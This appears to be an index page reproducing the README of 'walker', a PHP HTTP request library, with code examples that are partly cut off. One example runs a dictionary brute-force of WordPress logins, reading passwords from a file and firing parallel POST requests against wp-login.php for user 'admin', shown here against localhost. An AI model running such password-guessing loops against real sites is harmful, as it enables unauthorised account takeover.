Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/dmouse/walker


https://github.com/dmouse/walker

Last synced: 18 days ago
JSON representation

Awesome Lists containing this project

README

        

true, // false
"debug" => 1, // 0,1
"method" => "POST", // default GET
"data" => array("start"=>"0","limit"=>"8000"), //data POST
"proxy" => "127.0.0.1:9050", // proxy SOCKS5
);

$url = "http://www.google.com/";
$html = $w -> run ( $url, $op);
print $html;
?>

false,
"debug" => 1,
"method" => "POST",
"data" => array(
"usr"=>"admin",
"pwd"=>"xd",
),
);

$url = "http://localhost/wordpress/wp-login.php";

$dic = fopen("dic.txt","r");

$w -> multi_init();

while ( $pass = fgets($dic) ){
$op['data']['pwd'] = trim($pass);
$w -> multi_opts ($url, $op);
}

$res = $w -> multi_run();

foreach ($res as $key => $html){

print_r ($html);

}